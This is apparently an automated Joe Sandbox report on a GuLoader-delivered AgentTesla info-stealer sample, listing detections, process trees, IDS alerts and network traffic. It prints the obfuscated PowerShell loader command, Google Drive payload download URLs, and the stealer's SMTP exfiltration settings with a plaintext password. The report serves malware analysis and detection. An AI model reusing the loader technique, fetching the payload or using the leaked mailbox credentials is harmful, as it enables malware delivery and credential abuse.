Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
REnBTVfW8q.exe

Overview

General Information

Sample name:REnBTVfW8q.exe
renamed because original name is a hash value
Original sample name:5201c8e6b6fc7dab0c7877710df4ca1943b1f6c6d99e93bc0c21d79fa6ea9943.exe
Analysis ID:1549457
MD5:e6a0bb6bcaf44fbcc341ef4c93482059
SHA1:c624142c98aef78d3a0434cf308f42750315b4bb
SHA256:5201c8e6b6fc7dab0c7877710df4ca1943b1f6c6d99e93bc0c21d79fa6ea9943
Tags:exeuser-adrian__luca
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected GuLoader
AI detected suspicious sample
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • REnBTVfW8q.exe (PID: 752 cmdline: "C:\Users\user\Desktop\REnBTVfW8q.exe" MD5: E6A0BB6BCAF44FBCC341EF4C93482059)
    • powershell.exe (PID: 1568 cmdline: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles\Heterognath.Hjs' ; $Devilkin=$Cephalochorda.SubString(22951,3);.$Devilkin($Cephalochorda) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 7048 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.santonswitchgears.com", "Username": "tech1@santonswitchgears.com", "Password": "   cJPF@$I3   "}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles\Dusinenes.HavJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      C:\Users\user\AppData\Local\Temp\nsc2139.tmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        SourceRuleDescriptionAuthorStrings
        00000005.00000002.2677888739.0000000025194000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000005.00000002.2677888739.0000000025194000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000005.00000002.2677888739.00000000251BD000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              00000002.00000002.1647862127.00000000094F0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
                00000000.00000002.1438403773.0000000002999000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
                  Click to see the 5 entries

                  System Summary

                  barindex
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles\Heterognath.Hjs' ; $Devilkin=$Cephalochorda.SubString(22951,3);.$Devilkin($Cephalochorda) ", CommandLine: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles\Heterognath.Hjs' ; $Devilkin=$Cephalochorda.SubString(22951,3);.$Devilkin($Cephalochorda) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\REnBTVfW8q.exe", ParentImage: C:\Users\user\Desktop\REnBTVfW8q.exe, ParentProcessId: 752, ParentProcessName: REnBTVfW8q.exe, ProcessCommandLine: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles\Heterognath.Hjs' ; $Devilkin=$Cephalochorda.SubString(22951,3);.$Devilkin($Cephalochorda) ", ProcessId: 1568, ProcessName: powershell.exe
                  Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 142.250.185.238, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7048, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49710
                  Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 208.91.199.223, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7048, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49714
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles\Heterognath.Hjs' ; $Devilkin=$Cephalochorda.SubString(22951,3);.$Devilkin($Cephalochorda) ", CommandLine: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles\Heterognath.Hjs' ; $Devilkin=$Cephalochorda.SubString(22951,3);.$Devilkin($Cephalochorda) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\REnBTVfW8q.exe", ParentImage: C:\Users\user\Desktop\REnBTVfW8q.exe, ParentProcessId: 752, ParentProcessName: REnBTVfW8q.exe, ProcessCommandLine: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles\Heterognath.Hjs' ; $Devilkin=$Cephalochorda.SubString(22951,3);.$Devilkin($Cephalochorda) ", ProcessId: 1568, ProcessName: powershell.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-05T16:36:34.240688+010020229301A Network Trojan was detected20.109.210.53443192.168.2.849705TCP
                  2024-11-05T16:37:12.483432+010020229301A Network Trojan was detected20.109.210.53443192.168.2.849715TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-05T16:36:10.560898+010020301711A Network Trojan was detected192.168.2.849714208.91.199.223587TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-05T16:37:01.980691+010028555421A Network Trojan was detected192.168.2.849714208.91.199.223587TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-05T16:37:01.980691+010028552451A Network Trojan was detected192.168.2.849714208.91.199.223587TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-05T16:36:10.560898+010028400321A Network Trojan was detected192.168.2.849714208.91.199.223587TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: REnBTVfW8q.exeAvira: detected
                  Source: msiexec.exe.7048.5.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.santonswitchgears.com", "Username": "tech1@santonswitchgears.com", "Password": " cJPF@$I3 "}
                  Source: REnBTVfW8q.exeReversingLabs: Detection: 42%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                  Source: REnBTVfW8q.exeJoe Sandbox ML: detected
                  Source: REnBTVfW8q.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.8:49710 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.8:49711 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.8:49712 version: TLS 1.2
                  Source: REnBTVfW8q.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1646767837.0000000008B23000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: tem.Core.pdb source: powershell.exe, 00000002.00000002.1646767837.0000000008B23000.00000004.00000020.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeCode function: 0_2_00402862 FindFirstFileW,0_2_00402862
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeCode function: 0_2_004066F3 FindFirstFileW,FindClose,0_2_004066F3
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeCode function: 0_2_00405ABE CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405ABE

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.8:49714 -> 208.91.199.223:587
                  Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.8:49714 -> 208.91.199.223:587
                  Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.8:49714 -> 208.91.199.223:587
                  Source: Network trafficSuricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.8:49714 -> 208.91.199.223:587
                  Source: global trafficTCP traffic: 192.168.2.8:49714 -> 208.91.199.223:587
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                  Source: Joe Sandbox ViewIP Address: 208.91.199.223 208.91.199.223
                  Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: unknownDNS query: name: api.ipify.org
                  Source: unknownDNS query: name: api.ipify.org
                  Source: unknownDNS query: name: ip-api.com
                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.8:49715
                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.8:49705
                  Source: global trafficTCP traffic: 192.168.2.8:49714 -> 208.91.199.223:587
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1cPTY4gwGJX8CNpYT9E3V1C8xeZUU6szo HTTP/1.1User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /download?id=1cPTY4gwGJX8CNpYT9E3V1C8xeZUU6szo&export=download HTTP/1.1User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: drive.google.com
                  Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                  Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                  Source: global trafficDNS traffic detected: DNS query: ip-api.com
                  Source: global trafficDNS traffic detected: DNS query: smtp.santonswitchgears.com
                  Source: powershell.exe, 00000002.00000002.1646767837.0000000008B23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m;
                  Source: msiexec.exe, 00000005.00000002.2677888739.0000000025181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                  Source: msiexec.exe, 00000005.00000002.2677888739.0000000025181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                  Source: REnBTVfW8q.exe, 00000000.00000000.1406879585.000000000040A000.00000008.00000001.01000000.00000003.sdmp, REnBTVfW8q.exe, 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                  Source: powershell.exe, 00000002.00000002.1641405594.00000000061D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000002.00000002.1638881119.00000000052C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000002.00000002.1638881119.0000000005171000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2677888739.0000000025131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: msiexec.exe, 00000005.00000002.2677888739.00000000251BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://smtp.santonswitchgears.com
                  Source: msiexec.exe, 00000005.00000002.2677888739.00000000251BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
                  Source: powershell.exe, 00000002.00000002.1638881119.00000000052C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: REnBTVfW8q.exe, 00000000.00000000.1406900001.000000000044D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.skinstudio.netG
                  Source: powershell.exe, 00000002.00000002.1638881119.0000000005171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                  Source: msiexec.exe, 00000005.00000002.2677888739.0000000025131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                  Source: msiexec.exe, 00000005.00000002.2677888739.0000000025131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                  Source: msiexec.exe, 00000005.00000002.2677888739.0000000025131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                  Source: msiexec.exe, 00000005.00000003.1764587505.0000000009960000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1764500258.0000000009960000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
                  Source: powershell.exe, 00000002.00000002.1641405594.00000000061D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000002.00000002.1641405594.00000000061D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000002.00000002.1641405594.00000000061D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: msiexec.exe, 00000005.00000002.2665422405.00000000098EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
                  Source: msiexec.exe, 00000005.00000002.2665325367.0000000009850000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2665422405.00000000098EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1cPTY4gwGJX8CNpYT9E3V1C8xeZUU6szo
                  Source: msiexec.exe, 00000005.00000002.2665422405.00000000098EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1cPTY4gwGJX8CNpYT9E3V1C8xeZUU6szoxO
                  Source: msiexec.exe, 00000005.00000002.2665422405.0000000009947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                  Source: msiexec.exe, 00000005.00000003.1764587505.0000000009960000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2665422405.0000000009947000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1764500258.0000000009960000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1cPTY4gwGJX8CNpYT9E3V1C8xeZUU6szo&export=download
                  Source: powershell.exe, 00000002.00000002.1638881119.00000000052C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000002.00000002.1641405594.00000000061D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: msiexec.exe, 00000005.00000003.1764587505.0000000009960000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1764500258.0000000009960000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
                  Source: msiexec.exe, 00000005.00000003.1764587505.0000000009960000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1764500258.0000000009960000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
                  Source: msiexec.exe, 00000005.00000003.1764587505.0000000009960000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1764500258.0000000009960000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: msiexec.exe, 00000005.00000003.1764587505.0000000009960000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1764500258.0000000009960000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
                  Source: msiexec.exe, 00000005.00000003.1764587505.0000000009960000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1764500258.0000000009960000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                  Source: unknownHTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.8:49710 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.8:49711 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.8:49712 version: TLS 1.2
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeCode function: 0_2_00405553 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405553
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeCode function: 0_2_00403489 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,CoUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403489
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeCode function: 0_2_00404D900_2_00404D90
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeCode function: 0_2_00406ABA0_2_00406ABA
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0501DFE02_2_0501DFE0
                  Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_00C7E7585_2_00C7E758
                  Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_00C74AC05_2_00C74AC0
                  Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_00C741F05_2_00C741F0
                  Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_00C73EA85_2_00C73EA8
                  Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2805E8185_2_2805E818
                  Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_280566A05_2_280566A0
                  Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_280587D85_2_280587D8
                  Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_280500405_2_28050040
                  Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2805AC985_2_2805AC98
                  Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_280559D05_2_280559D0
                  Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_28058EDF5_2_28058EDF
                  Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2805B3785_2_2805B378
                  Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_280533C85_2_280533C8
                  Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_280500115_2_28050011
                  Source: REnBTVfW8q.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/13@5/5
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeCode function: 0_2_00403489 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,CoUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403489
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeCode function: 0_2_00404814 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404814
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeCode function: 0_2_004020FE CoCreateInstance,0_2_004020FE
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeFile created: C:\Program Files (x86)\Common Files\Jervin197.iniJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3636:120:WilError_03
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeFile created: C:\Users\user\AppData\Local\Temp\nsc2138.tmpJump to behavior
                  Source: REnBTVfW8q.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
                  Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: REnBTVfW8q.exeReversingLabs: Detection: 42%
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeFile read: C:\Users\user\Desktop\REnBTVfW8q.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\REnBTVfW8q.exe "C:\Users\user\Desktop\REnBTVfW8q.exe"
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles\Heterognath.Hjs' ; $Devilkin=$Cephalochorda.SubString(22951,3);.$Devilkin($Cephalochorda) "
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
